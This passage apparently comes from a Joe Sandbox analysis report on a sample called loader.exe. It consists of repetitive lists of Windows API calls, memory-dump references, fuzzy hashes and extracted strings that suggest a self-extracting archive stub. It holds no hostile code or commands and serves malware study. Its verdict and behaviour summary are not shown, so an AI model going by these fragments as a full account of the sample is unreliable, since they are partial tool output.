              • DispatchMessageW.USER32(?), ref: 0011D331
              • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0011D33C
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
              • String ID:
              • API String ID: 2148572870-0
              • Opcode ID: b464873353a297b43b61d9f404622e5144771ff6908ca839b953e28474195eb4
              • Instruction ID: 66e2fe6b070be37f06fe65bb83700c100b5a8bf49b886b11c901edb7acb9d511
              • Opcode Fuzzy Hash: b464873353a297b43b61d9f404622e5144771ff6908ca839b953e28474195eb4
              • Instruction Fuzzy Hash: 36F03C72A01519BBCB215BA1EC4CEDBBF6DEF51391F008022FA16D2050D7758581C7B1
              APIs
              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,001289AD,?,00000000,?,00000001,?,?,00000001,001289AD,?), ref: 0012C0E6
              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0012C16F
              • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,001267E2,?), ref: 0012C181
              • __freea.LIBCMT ref: 0012C18A
                • Part of subcall function 00128518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0012C13D,00000000,?,001267E2,?,00000008,?,001289AD,?,?,?), ref: 0012854A
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
              • String ID: ^PpL
              • API String ID: 2652629310-914357616
              • Opcode ID: 4aa9533a7de2b98babdd46fb8270a854f362f4a99a41540e389bdedf9dd99040
              • Instruction ID: 48cd754e11a0ec425572d2689b00caa045bc3dd18509ff69db313015e8b744a1
              • Opcode Fuzzy Hash: 4aa9533a7de2b98babdd46fb8270a854f362f4a99a41540e389bdedf9dd99040
              • Instruction Fuzzy Hash: A831AE72A0022AEBDB258F64EC46DAF7BA5EB54710F150228FD14D7151E735CDA1CBE0
              APIs
              • _wcschr.LIBVCRUNTIME ref: 0011C435
                • Part of subcall function 001117AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0010BB05,00000000,.exe,?,?,00000800,?,?,001185DF,?), ref: 001117C2
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: CompareString_wcschr
              • String ID: <$HIDE$MAX$MIN
              • API String ID: 2548945186-3358265660
              • Opcode ID: b0e70a5a2561b476d63b2a1e532c3feb877e530b20448b7d6c93453120401b66
              • Instruction ID: 19e766e9c9f276c19022e80c09826dcaab23de0cb8dde3b94da781d69b441bcc
              • Opcode Fuzzy Hash: b0e70a5a2561b476d63b2a1e532c3feb877e530b20448b7d6c93453120401b66
              • Instruction Fuzzy Hash: A1318372944209AADB29DA94DC41EEB77BDEF24700F0040B6FA05D6090EBB49EC4CA90
              APIs
              • LoadBitmapW.USER32(00000065), ref: 0011ADFD
              • GetObjectW.GDI32(00000000,00000018,?), ref: 0011AE22
              • DeleteObject.GDI32(00000000), ref: 0011AE54
              • DeleteObject.GDI32(00000000), ref: 0011AE77
                • Part of subcall function 00119E1C: FindResourceW.KERNEL32(0011AE4D,PNG,?,?,?,0011AE4D,00000066), ref: 00119E2E
                • Part of subcall function 00119E1C: SizeofResource.KERNEL32(00000000,00000000,?,?,?,0011AE4D,00000066), ref: 00119E46
                • Part of subcall function 00119E1C: LoadResource.KERNEL32(00000000,?,?,?,0011AE4D,00000066), ref: 00119E59
                • Part of subcall function 00119E1C: LockResource.KERNEL32(00000000,?,?,?,0011AE4D,00000066), ref: 00119E64
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
              • String ID: ]
              • API String ID: 142272564-3352871620
              • Opcode ID: c428617d262a974d19afc18d36ecb2ee9ba55034aca7709ae849b262fa77379c
              • Instruction ID: 3eda93ecb739b9fbebd1bedb761cead9b456a31e4d51c7121f0cb6dc4c7826c9
              • Opcode Fuzzy Hash: c428617d262a974d19afc18d36ecb2ee9ba55034aca7709ae849b262fa77379c
              • Instruction Fuzzy Hash: B8018536943212A7CB1427A4AC15AFF7F7AAF81B02F080030FD10B7291DF718CA582B2
              APIs
                • Part of subcall function 0010130B: GetDlgItem.USER32(00000000,00003021), ref: 0010134F
                • Part of subcall function 0010130B: SetWindowTextW.USER32(00000000,001335B4), ref: 00101365
              • EndDialog.USER32(?,00000001), ref: 0011CCDB
              • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0011CCF1
              • SetDlgItemTextW.USER32(?,00000066,?), ref: 0011CD05
              • SetDlgItemTextW.USER32(?,00000068), ref: 0011CD14
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: ItemText$DialogWindow
              • String ID: RENAMEDLG
              • API String ID: 445417207-3299779563
              • Opcode ID: ba2fc7f33def02a221315d5793ecb2c9167acee68c709b94036f47830aac78d8
              • Instruction ID: db30345b57b1a7fb6fa96a53147ab8045c1c6c6fee45eea98e951f740dca4783
              • Opcode Fuzzy Hash: ba2fc7f33def02a221315d5793ecb2c9167acee68c709b94036f47830aac78d8
              • Instruction Fuzzy Hash: A501F5326C4310BAD5194F64AC09FAB7B9CAB9A742F100420F345A64E0C7F299848BE6
              APIs
                • Part of subcall function 00110085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 001100A0
                • Part of subcall function 00110085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0010EB86,Crypt32.dll,00000000,0010EC0A,?,?,0010EBEC,?,?,?), ref: 001100C2
              • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0010EB92
              • GetProcAddress.KERNEL32(001481C0,CryptUnprotectMemory), ref: 0010EBA2
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AddressProc$DirectoryLibraryLoadSystem
              • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
              • API String ID: 2141747552-1753850145
              • Opcode ID: 704bccfe91f1813f74e6a2b1aa6b19ac7377eef9aa7820d8384e79743dfe68d9
              • Instruction ID: 1cb3bd9854bf804851e56828b94f37ad8860bc445f2e82d6f162904cd2a78bd5
              • Opcode Fuzzy Hash: 704bccfe91f1813f74e6a2b1aa6b19ac7377eef9aa7820d8384e79743dfe68d9
              • Instruction Fuzzy Hash: BFE04670900741EECB259F399808B42BEE46B1870AF04885EF4E6E3680DBF5D5C08B64
              APIs
              • GetEnvironmentStringsW.KERNEL32 ref: 0012B619
              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0012B63C
                • Part of subcall function 00128518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0012C13D,00000000,?,001267E2,?,00000008,?,001289AD,?,?,?), ref: 0012854A
              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0012B662
              • _free.LIBCMT ref: 0012B675
              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0012B684
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
              • String ID:
              • API String ID: 336800556-0
              • Opcode ID: fefbb83793c3c5d8a2e75cb2f0c8901a2a51b0d8783b5721709eaf192933e5e8
              • Instruction ID: 52fde679e7fe2286a07bb3a721bf1fd8367a93c4de8bb90d55b1ba50a9eeb6b7
              • Opcode Fuzzy Hash: fefbb83793c3c5d8a2e75cb2f0c8901a2a51b0d8783b5721709eaf192933e5e8
              • Instruction Fuzzy Hash: 2A01DFB2A06231BF63251ABA7CCCC7B6B6DDFC6BA13150228FD14C3110EFA18D11A1B0
              APIs
              • GetLastError.KERNEL32(?,?,?,0012895F,001285FB,?,00128FD3,00000001,00000364,?,00123713,00000050,?,00140EE8,00000200), ref: 0012902E
              • _free.LIBCMT ref: 00129063
              • _free.LIBCMT ref: 0012908A
              • SetLastError.KERNEL32(00000000,?,00140EE8,00000200), ref: 00129097
              • SetLastError.KERNEL32(00000000,?,00140EE8,00000200), ref: 001290A0
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: ErrorLast$_free
              • String ID:
              • API String ID: 3170660625-0
              • Opcode ID: 5e5d65385f7ebc12bf88322fdceb6fafe48ebace7109021ffce66b7aeece5b68
              • Instruction ID: 51b225f96ccf8fbbea6bfd439c0d0440df2ccc3d456b8ba826a2f50afc5fdef7
              • Opcode Fuzzy Hash: 5e5d65385f7ebc12bf88322fdceb6fafe48ebace7109021ffce66b7aeece5b68
              • Instruction Fuzzy Hash: 4101F4B2506B346BD326277D7C85A2B265D9FE07B1B350128F51592292EF648C71416C
              APIs
                • Part of subcall function 00110A41: ResetEvent.KERNEL32(?), ref: 00110A53
                • Part of subcall function 00110A41: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00110A67
              • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 0011078F
              • CloseHandle.KERNEL32(?,?), ref: 001107A9
              • DeleteCriticalSection.KERNEL32(?), ref: 001107C2
              • CloseHandle.KERNEL32(?), ref: 001107CE
              • CloseHandle.KERNEL32(?), ref: 001107DA
                • Part of subcall function 0011084E: WaitForSingleObject.KERNEL32(?,000000FF,00110A78,?), ref: 00110854
                • Part of subcall function 0011084E: GetLastError.KERNEL32(?), ref: 00110860
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
              • String ID:
              • API String ID: 1868215902-0
              • Opcode ID: eb0c03343508b174157f913cc1167ae5d637a29e4b7c0fe04c1c5797dee48c1d
              • Instruction ID: b05ee34b34cffb1590d56766d77ed4f4d5bfaf3224237cfff2a77190c88fd559
              • Opcode Fuzzy Hash: eb0c03343508b174157f913cc1167ae5d637a29e4b7c0fe04c1c5797dee48c1d
              • Instruction Fuzzy Hash: A9019272944B04EBC7269B65DD84FC6BBE9FB48711F000529F16A825A0CBB56AC4CBA4
              APIs
              • _free.LIBCMT ref: 0012BF28
                • Part of subcall function 001284DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0012BFA7,?,00000000,?,00000000,?,0012BFCE,?,00000007,?,?,0012C3CB,?), ref: 001284F4
                • Part of subcall function 001284DE: GetLastError.KERNEL32(?,?,0012BFA7,?,00000000,?,00000000,?,0012BFCE,?,00000007,?,?,0012C3CB,?,?), ref: 00128506
              • _free.LIBCMT ref: 0012BF3A
              • _free.LIBCMT ref: 0012BF4C
              • _free.LIBCMT ref: 0012BF5E
              • _free.LIBCMT ref: 0012BF70
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: _free$ErrorFreeHeapLast
              • String ID:
              • API String ID: 776569668-0
              • Opcode ID: 84a39a54ef0f238c76daa1922a572995f3555a3a3849937221496e76c9c6ae6e
              • Instruction ID: 266a8991160d307b8c2b4d7bbf38a56ade5b19c1c8d6021229e8e643c03ba29e
              • Opcode Fuzzy Hash: 84a39a54ef0f238c76daa1922a572995f3555a3a3849937221496e76c9c6ae6e
              • Instruction Fuzzy Hash: 60F0F932509365ABC724EFA8FEC6D1A77E9BB107107644849F048D7D90CB24FCA08A64
              APIs
              • _free.LIBCMT ref: 0012807E
                • Part of subcall function 001284DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0012BFA7,?,00000000,?,00000000,?,0012BFCE,?,00000007,?,?,0012C3CB,?), ref: 001284F4
                • Part of subcall function 001284DE: GetLastError.KERNEL32(?,?,0012BFA7,?,00000000,?,00000000,?,0012BFCE,?,00000007,?,?,0012C3CB,?,?), ref: 00128506
              • _free.LIBCMT ref: 00128090
              • _free.LIBCMT ref: 001280A3
              • _free.LIBCMT ref: 001280B4
              • _free.LIBCMT ref: 001280C5
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: _free$ErrorFreeHeapLast
              • String ID:
              • API String ID: 776569668-0
              • Opcode ID: 643f2ceab1a57ad85e01b99c0cc536dfb20f79ceb1ee15c4ea633fab1e6d5e04
              • Instruction ID: dcd98ed3d55325c4d4e2ade96be1019a9420ed74c6a4289f7ea246a439cd02f7
              • Opcode Fuzzy Hash: 643f2ceab1a57ad85e01b99c0cc536dfb20f79ceb1ee15c4ea633fab1e6d5e04
              • Instruction Fuzzy Hash: 95F05E79802275ABC7517F15FC115453BA5F72472031D464AF801A7EB0CFB108E5AFC1
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID:
              • String ID: ^PpL
              • API String ID: 0-914357616
              • Opcode ID: 21555ca7473de798ad9dcca7a74cf9d5673b34bd562cd552d6d26d91aa1c3ad9
              • Instruction ID: c3f1b45217742abd82610aeec79290f0bd6fa7c802b8318d36af60070879c37b
              • Opcode Fuzzy Hash: 21555ca7473de798ad9dcca7a74cf9d5673b34bd562cd552d6d26d91aa1c3ad9
              • Instruction Fuzzy Hash: CB51E07190022AAFCF149FA8EC45FAEBBB4EF59314F14003DF404A72A1C7749A62CB61
              APIs
              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\loader.exe,00000104), ref: 001276FD
              • _free.LIBCMT ref: 001277C8
              • _free.LIBCMT ref: 001277D2
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: _free$FileModuleName
              • String ID: C:\Users\user\Desktop\loader.exe
              • API String ID: 2506810119-2389675944
              • Opcode ID: 75ee747f911f30fe3f54b3df2fc7f0f62e9c65e25c0b2774a20f899c0e2f2e57
              • Instruction ID: a80a236038a3bda2ba8b4db4d1998869817291d0d96e428923afd35262ae6d09
              • Opcode Fuzzy Hash: 75ee747f911f30fe3f54b3df2fc7f0f62e9c65e25c0b2774a20f899c0e2f2e57
              • Instruction Fuzzy Hash: 37318075A09228BFDB21DF99FC85D9FBBFCEB95310B1440A6E80497651D7B04E90CBA0
              APIs
              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000,?,00000000,?,?,0012F5EF,?,00000000,?), ref: 0012F343
              • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,0012F5EF,?,00000000,?,00000000,00000000,?,00000000), ref: 0012F371
              • GetLastError.KERNEL32(?,0012F5EF,?,00000000,?,00000000,00000000,?,00000000), ref: 0012F3A2
              Strings
              Similarity
              • API ID: ByteCharErrorFileLastMultiWideWrite
              • String ID: ^PpL
              APIs
              • __EH_prolog.LIBCMT ref: 00107579
                • Part of subcall function 00103B3D: __EH_prolog.LIBCMT ref: 00103B42
              • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00107640
                • Part of subcall function 00107BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 00107C04
                • Part of subcall function 00107BF5: GetLastError.KERNEL32 ref: 00107C4A
                • Part of subcall function 00107BF5: CloseHandle.KERNEL32(?), ref: 00107C59
              Strings
              Similarity
              • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
              • String ID: SeRestorePrivilege$SeSecurityPrivilege
              APIs
                • Part of subcall function 0010130B: GetDlgItem.USER32(00000000,00003021), ref: 0010134F
                • Part of subcall function 0010130B: SetWindowTextW.USER32(00000000,001335B4), ref: 00101365
              • EndDialog.USER32(?,00000001), ref: 0011A4B8
              • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 0011A4CD
              • SetDlgItemTextW.USER32(?,00000066,?), ref: 0011A4E2
              Strings
              Similarity
              • API ID: ItemText$DialogWindow
              • String ID: ASKNEXTVOL
              APIs
              Strings
              Similarity
              • API ID: __fprintf_l_strncpy
              • String ID: $%s$@%s
              APIs
                • Part of subcall function 0010130B: GetDlgItem.USER32(00000000,00003021), ref: 0010134F
                • Part of subcall function 0010130B: SetWindowTextW.USER32(00000000,001335B4), ref: 00101365
              • EndDialog.USER32(?,00000001), ref: 0011A9DE
              • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 0011A9F6
              • SetDlgItemTextW.USER32(?,00000067,?), ref: 0011AA24
              Strings
              Similarity
              • API ID: ItemText$DialogWindow
              • String ID: GETPASSWORD1
              APIs
              • _swprintf.LIBCMT ref: 0010B51E
                • Part of subcall function 0010400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0010401D
              • _wcschr.LIBVCRUNTIME ref: 0010B53C
              • _wcschr.LIBVCRUNTIME ref: 0010B54C
              Strings
              Similarity
              • API ID: _wcschr$__vswprintf_c_l_swprintf
              • String ID: %c:\
              APIs
              • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0010ABC5,00000008,?,00000000,?,0010CB88,?,00000000), ref: 001106F3
              • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0010ABC5,00000008,?,00000000,?,0010CB88,?,00000000), ref: 001106FD
              • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0010ABC5,00000008,?,00000000,?,0010CB88,?,00000000), ref: 0011070D
              Strings
              • Thread pool initialization failed., xrefs: 00110725
              Similarity
              • API ID: Create$CriticalEventInitializeSectionSemaphore
              • String ID: Thread pool initialization failed.
              Strings
              Similarity
              • API ID:
              • String ID: RENAMEDLG$REPLACEFILEDLG
              APIs
              • SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 0011D29D
              • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0011D2D9
              Strings
              Similarity
              • API ID: EnvironmentVariable
              • String ID: sfxcmd$sfxpar
              APIs
              Similarity
              • API ID: __alldvrm$_strrchr
              • String ID:
              APIs
              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,001080B7,?,?,?), ref: 0010A351
              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,001080B7,?,?), ref: 0010A395
              • SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,001080B7,?,?,?,?,?,?,?,?), ref: 0010A416
              • CloseHandle.KERNEL32(?,?,00000000,?,001080B7,?,?,?,?,?,?,?,?,?,?,?), ref: 0010A41D
              Similarity
              • API ID: File$Create$CloseHandleTime
              • String ID:
              APIs
              • ___BuildCatchObject.LIBVCRUNTIME ref: 0012251A
                • Part of subcall function 00122B52: ___AdjustPointer.LIBCMT ref: 00122B9C
              • _UnwindNestedFrames.LIBCMT ref: 00122531
              • ___FrameUnwindToState.LIBVCRUNTIME ref: 00122543
              • CallCatchBlock.LIBVCRUNTIME ref: 00122567
              Similarity
